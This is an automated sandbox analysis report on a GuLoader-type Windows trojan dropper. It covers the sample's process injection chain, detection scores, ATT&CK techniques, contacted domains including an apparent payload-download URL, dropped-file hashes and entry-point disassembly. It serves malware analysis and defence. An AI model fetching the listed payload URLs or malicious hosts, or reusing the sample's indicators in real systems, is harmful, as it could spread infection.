          | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
          | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
          | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |

          [Behavior graph: ID: 1588655, Sample: 02Eh1ah35H.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100. Process chain: 02Eh1ah35H.exe (started) -> 02Eh1ah35H.exe (started) -> RAVCpl64.exe (injected) -> waitfor.exe (started) -> firefox.exe (started)]

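          | Source | Detection | Scanner | Label | Link |
          | --- | --- | --- | --- | --- |
          | 02Eh1ah35H.exe | 50% | ReversingLabs | Win32.Trojan.Guloader | |
          | 02Eh1ah35H.exe | 100% | Avira | TR/Injector.emxhl | |
          | 02Eh1ah35H.exe | 69% | Virustotal | | Browse |
          | 02Eh1ah35H.exe | 100% | Joe Sandbox ML | | |

          | Source | Detection | Scanner | Label | Link |
          | --- | --- | --- | --- | --- |
          | C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dll | 0% | ReversingLabs | | |

          No Antivirus matches
          No Antivirus matches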
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.Jcsa.infowaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://claimstakes.online/Jwaitfor.exe, 00000004.00000002.33487548147.00000000089B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_alldp.icowaitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd02Eh1ah35H.exe, 00000002.00000001.28252790444.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://i1.cdn-image.com/__media__/pics/8934/rcomlogo.jpgwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.jcsa.info/Best_Online_University.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQhwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-21402Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://claimstakes.online/waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://i1.cdn-image.com/__media__/pics/28903/search.png)waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://ocsp.quovadisoffshore.com002Eh1ah35H.exe, 00000002.00000003.28344629314.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458149111.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458638393.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458259978.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458503054.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28513958061.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28344854813.0000000003003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://claimstakes.online/%waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://delivery.consentmanager.netwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.jcsa.info/Community_College_Search.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.register.com/?trkID=WSTm3u15CWwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icowaitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.jcsa.info/display.cfmwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://i2.cdn-image.com/__media__/pics/8934/rcomlogo.jpgwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://babalharra.com.au/BJuAryIbeCLh111.binG02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588655
Start date and time: 2025-01-11 03:51:25 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: 02Eh1ah35H.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/6@27/16
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 62
• Number of non-executed functions: 288
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Max analysis timeout: 600s exceeded, the analysis took too long
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 142.250.190.99, 142.250.191.110, 142.250.111.84, 172.217.1.106, 142.250.190.138, 142.250.190.42, 142.250.191.170, 142.250.191.234, 172.217.2.42, 142.250.191.106, 172.217.0.170, 172.217.4.202, 142.250.191.202, 172.217.5.10, 142.250.190.106, 142.250.191.138, 142.250.190.74, 142.250.190.10, 142.250.190.35, 52.113.194.132
• Excluded domains from analysis (whitelisted): ecs.office.com, clients2.google.com, redirector.gvt1.com, edgedl.me.gvt1.com, accounts.google.com, claimstakes.online, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, www.googleapis.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            21:55:02API Interceptor29603339x Sleep call for process: waitfor.exe modified
                                                                                                                                                            XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 18.163.74.139
                                                                                                                                                            http://www.jadavisinjurylawyers.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 54.231.128.160
                                                                                                                                                            DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUhttp://www.austrata.net.auGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.184.154.201
                                                                                                                                                            https://snip.ly/kx81x2Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 203.170.87.17
                                                                                                                                                            la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 103.226.223.88
                                                                                                                                                            https://www.google.co.id/url?q=sf_rand(2000)CHARtTPSJ3J3wDyycT&sa=t&esrc=sf_rand(2000)gECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=sf_rand(2000)RlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/apcarpetcleaning.com.au%2Fkom%2Fwp-images%2Fpoom%0A%2Fsf_rand_string_mixed(24)/tmitchell@encorecompliance.comGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 203.170.84.122
                                                                                                                                                            Last Annual payment.htmGet hashmaliciousPhisherBrowse
                                                                                                                                                            • 203.170.84.122
                                                                                                                                                            http://www.therowlands.com.au/wp-includes/js/jquery/jquery-migrate.min.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 203.170.86.89
                                                                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                            • 103.20.200.105
                                                                                                                                                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • 122.201.127.17
                                                                                                                                                            http://nxsnsstwhbaf.apexhallechuca.com.au/?userid=bHN3ZXN0LXN5c0BudHRscy5jby5qcA==Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 203.170.87.17
                                                                                                                                                            http://nxsnsstwhbaf.apexhallechuca.com.au/?userid=bHN3ZXN0LXN5c0BudHRscy5jby5qcA==Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 203.170.87.17
                                                                                                                                                            MULTIBAND-NEWHOPEUSsuBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.77.109
                                                                                                                                                            k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.79.41
                                                                                                                                                            XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.79.41
                                                                                                                                                            BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.77.109
                                                                                                                                                            hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.79.42
                                                                                                                                                            5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.77.107
                                                                                                                                                            gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.79.40
                                                                                                                                                            0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.77.107
                                                                                                                                                            NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.77.107
                                                                                                                                                            9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.79.41
                                                                                                                                                                              Process:C:\Windows\SysWOW64\waitfor.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):135168
                                                                                                                                                                              Entropy (8bit):1.1142956103012707
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                                                                                              MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                                                                                              SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                                                                                              SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                                                                                              SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              Process:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                              Entropy (8bit):5.737556724687435
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                                                                                                                                                              MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                                                                                                                                                              SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                                                                                                                                                              SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                                                                                                                                                              SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Joe Sandbox View:
• Filename: Document_084462.scr.exe, Detection: malicious
• Filename: Document_084462.scr.exe, Detection: malicious
• Filename: PO.exe, Detection: malicious
• Filename: PO.exe, Detection: malicious
• Filename: yuc1Jwlkh5.exe, Detection: malicious
• Filename: yuc1Jwlkh5.exe, Detection: malicious
• Filename: IMAGE000Pdf.exe, Detection: malicious
• Filename: stormskridtets.exe, Detection: malicious
• Filename: IMAGE000Pdf.exe, Detection: malicious
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              Process:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):222131
                                                                                                                                                                              Entropy (8bit):1.2548431305039245
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:I2mmH3AhfHp+POGgRSRFZHl2bxYLbBjJ4tFGZjDyYqIx3x9+6yiKk+vlK5u5DF+G:UoNwkuoHtyiKJlQVD
                                                                                                                                                                              MD5:C018B5D87F38B0DBA90AFE75F72B6798
                                                                                                                                                                              SHA1:9B43AE84826B712BB8152D70D2D7B929DB5CE3E2
                                                                                                                                                                              SHA-256:323B7D5F0C7A4F9FA87D8F6DD9A18E81F4284C31DA4FDD5FFE7022501445FD1C
                                                                                                                                                                              SHA-512:D4D6A99EBA1F594BA4052F4C83C93946749EE7524D5765CFD67C0CD34BBA3F1ABBDEA259EBE155A3767898AAE806E29E42BE6539C4A2DC067730EC6D9655ECD5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):477418
                                                                                                                                                                              Entropy (8bit):1.2516735777117096
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:BugSY71rrh1lxz0ZSyCjm0eydI6Vl73+ByRgN:F7Zrh4SvQy3SBGgN
                                                                                                                                                                              MD5:B86B0A4CFA46775BAEEE023CCECA54E1
                                                                                                                                                                              SHA1:16BABC347EBFC80762D73A12FF39E5ADE55EC7DB
                                                                                                                                                                              SHA-256:7B1E45A0398C8428C6CF476DAE264102A842FACC20930B57688960046FF087F6
                                                                                                                                                                              SHA-512:42787A7037E7D117D82AF3580306C7C10854B279CEC0B38956217B4E04222B34EAC50763B0DB850454DC0AA43B5238297D39FC8E5A681C805966E0BCCD4E7C0D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):273298
                                                                                                                                                                              Entropy (8bit):7.755785174749238
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:qz5senqHDSrcDmVvWHleK1735QPec3p/v1m/inzYS5O:qVF8WcDSvWH8K9pQmcvyGYX
                                                                                                                                                                              MD5:EF147A600EB913E453C8376095C627C5
                                                                                                                                                                              SHA1:C610761555E74460763F6737740644C683A92B54
                                                                                                                                                                              SHA-256:B22893A26EE265E7F901FB92E115CB5C8A483A56800CB7D85F435AD4A042B61E
                                                                                                                                                                              SHA-512:3F96C9D5D2B7427E79EFC829325C9911C861BA49FAAEF525B8826C6829FF1485FFDBD64A83BF98193B3D97E1E854416322A6AF6C4F98CE79677EFD1006179C40
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):116773
                                                                                                                                                                              Entropy (8bit):1.2617404262864118
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:4yTqkjNz46YyMqMTGZGi7vk59sktCQ3am6ZRN8rOFlS70dhEr:0avCLJ
                                                                                                                                                                              MD5:753C4F9B2F84095556E2C65E2569D814
                                                                                                                                                                              SHA1:3F878C44B311B8C34B2A6E09F49324D42FAD1437
                                                                                                                                                                              SHA-256:E6DCE06287ACEBCFB23DA58EAC6AAA36E253BADB493125F47E801B99C4E48B25
                                                                                                                                                                              SHA-512:8C19F357F4A59D5CB493F418C82B0D06ECED25EC9D05E9B1CFF943A6A79232DC6B2EBC3552B0BFBA76018A7FCEFE8A0410ADEE739151640F149884A4FC3DF651
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                              Entropy (8bit):7.958584060074148
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:02Eh1ah35H.exe
                                                                                                                                                                              File size:441'369 bytes
                                                                                                                                                                              MD5:8b28f25bafe08a5b838ee152a75d14ae
                                                                                                                                                                              SHA1:ed2b19ce4a23e1bb09f76658f9b257baaa4d7f59
                                                                                                                                                                              SHA256:8c4c1550cb63a4c8abebb1ef8a7601953c6c1f0d02f1080f1fb7adc306b99c31
                                                                                                                                                                              SHA512:297bb7e67bcdfb588c521909dc10d012f5b2c8a05f2ffb8c66a74c4101cdfd6d0182879aaad71cf8e4c73bcd59245140f9463046049c0424d474a3016e8c6f76
                                                                                                                                                                              SSDEEP:12288:B3UTPUWt3mXGKr3UnWyPOHBieD7e5QuZN9sUS0zT:B3UTMWt3mXGOUWy5Z0US0z
                                                                                                                                                                              TLSH:2B9422A1A7A0523BC1E71672286627334EDFAC63383943570F247F993DB61438B576A3
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....
                                                                                                                                                                              Icon Hash:3d2e0f95332b3399
                                                                                                                                                                              Entrypoint:0x4034a2
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                                                                                                                                                              Instruction
                                                                                                                                                                              sub esp, 000002D4h
                                                                                                                                                                              push ebx
                                                                                                                                                                              push esi
                                                                                                                                                                              push edi
                                                                                                                                                                              push 00000020h
                                                                                                                                                                              pop edi
                                                                                                                                                                              xor ebx, ebx
                                                                                                                                                                              push 00008001h
                                                                                                                                                                              mov dword ptr [esp+14h], ebx
                                                                                                                                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                              mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                              call dword ptr [004080CCh]
                                                                                                                                                                              call dword ptr [004080D0h]
                                                                                                                                                                              and eax, BFFFFFFFh
                                                                                                                                                                              cmp ax, 00000006h
                                                                                                                                                                              mov dword ptr [007A8A6Ch], eax
                                                                                                                                                                              je 00007F7CB8B69043h
                                                                                                                                                                              push ebx
                                                                                                                                                                              call 00007F7CB8B6C331h
                                                                                                                                                                              cmp eax, ebx
                                                                                                                                                                              je 00007F7CB8B69039h
                                                                                                                                                                              push 00000C00h
                                                                                                                                                                              call eax
                                                                                                                                                                              mov esi, 004082B0h
                                                                                                                                                                              push esi
                                                                                                                                                                              call 00007F7CB8B6C2ABh
                                                                                                                                                                              push esi
                                                                                                                                                                              call dword ptr [00408154h]
                                                                                                                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                              cmp byte ptr [esi], 00000000h
                                                                                                                                                                              jne 00007F7CB8B6901Ch
                                                                                                                                                                              push 0000000Bh
                                                                                                                                                                              call 00007F7CB8B6C304h
                                                                                                                                                                              push 00000009h
                                                                                                                                                                              call 00007F7CB8B6C2FDh
                                                                                                                                                                              push 00000007h
                                                                                                                                                                              mov dword ptr [007A8A64h], eax
                                                                                                                                                                              call 00007F7CB8B6C2F1h
                                                                                                                                                                              cmp eax, ebx
                                                                                                                                                                              je 00007F7CB8B69041h
                                                                                                                                                                              push 0000001Eh
                                                                                                                                                                              call eax
                                                                                                                                                                              test eax, eax
                                                                                                                                                                              je 00007F7CB8B69039h
                                                                                                                                                                              or byte ptr [007A8A6Fh], 00000040h
                                                                                                                                                                              push ebp
                                                                                                                                                                              call dword ptr [00408038h]
                                                                                                                                                                              push ebx
                                                                                                                                                                              call dword ptr [00408298h]
                                                                                                                                                                              mov dword ptr [007A8B38h], eax
                                                                                                                                                                              push ebx
                                                                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                                                                              push 000002B4h
                                                                                                                                                                              push eax
                                                                                                                                                                              push ebx
                                                                                                                                                                              push 0079FF08h
                                                                                                                                                                              call dword ptr [0040818Ch]
                                                                                                                                                                              push 0040A2C8h
                                                                                                                                                                              Programming Language:
                                                                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c7000 | 0xb48 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x656c | 0x6600 | 12117ad2476c7a7912407af0dcfcb8a7 | False | 0.6737515318627451 | data | 6.47208759712619 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1398 | 0x1400 | e3e8d62e1d2308b175349eb9daa266c8 | False | 0.4494140625 | data | 5.137750894959169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x39eb78 | 0x600 | 2020ca26e010546720fd467c5d087b57 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a9000 | 0x1e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
